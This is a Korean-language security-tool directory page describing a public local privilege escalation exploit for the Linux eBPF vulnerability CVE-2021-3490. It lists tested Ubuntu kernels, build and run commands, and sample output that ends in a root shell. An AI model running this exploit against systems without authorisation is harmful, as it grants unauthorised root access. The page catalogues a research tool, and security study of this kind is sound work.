Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
Linux_LPE_eBPF_CVE-2021-3490 | Kitploit
도구/GitHubGitHub/chompie1337/linux_lpe_ebpf_cve-2021-3490
Privilege EscalationVulnerability AnalysisExploitationLearning & EducationBinary Exploitation
GitHubchompie1337/linux_lpe_ebpf_cve-2021-3490

Linux_LPE_eBPF_CVE-2021-3490

저장소 보기

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
317483년 전Kitploit 검토 완료

Linux_LPE_eBPF_CVE-2021-3490

CVE-2021-3490에 대한 LPE 익스플로잇입니다. Ubuntu 20.04.02 및 20.10(Groovy Gorilla) 커널 5.8.0-25.26부터 5.8.0-52.58까지 테스트되었습니다. 그리고 Ubuntu 21.04(Hirsute Hippo) 5.11.0-16.17에서도 테스트되었습니다. 이 취약점은 Manfred Paul @_manfp이(가) 발견했으며 이 commit에서 패치되었습니다.

작성자: @chompie1337

교육/연구 목적으로만 사용하세요. 사용에 따른 책임은 본인에게 있습니다.

사용 방법:

Ubuntu 20.04.02 및 Ubuntu 20.10(Groovy Gorilla)용으로 빌드하려면:

root@kitploit:~
make groovy

Ubuntu 21.04(Hirsute Hippo)용으로 빌드하려면:

root@kitploit:~
make hirsute

실행하려면:

root@kitploit:~
bin/exploit.bin
[+] eBPF enabled, maps created!
[+] addr of oob BPF array map: ffffa008c1202110
[+] addr of array_map_ops: ffffffff956572a0
[+] kernel read successful!
[!] searching for init_pid_ns in kstrtab ...
[+] addr of init_pid_ns in kstrtab: ffffffff95b03a4a
[!] searching for init_pid_ns in ksymtab...
[+] addr of init_pid_ns ffffffff96062d00
[!] searching for creds for pid: 770
[+] addr of cred structure: ffffa0086758dec0
[!] preparing to overwrite creds...
[+] success! enjoy r00t :)
#

참고: 커널 패닉을 방지하고 정리 작업을 수행하려면 root 셸에서 exit를 입력하여 반드시 완전히 종료해야 합니다.

라이트업 Kernel Pwning with eBPF: a Love Story를 확인하세요.

도구 다운로드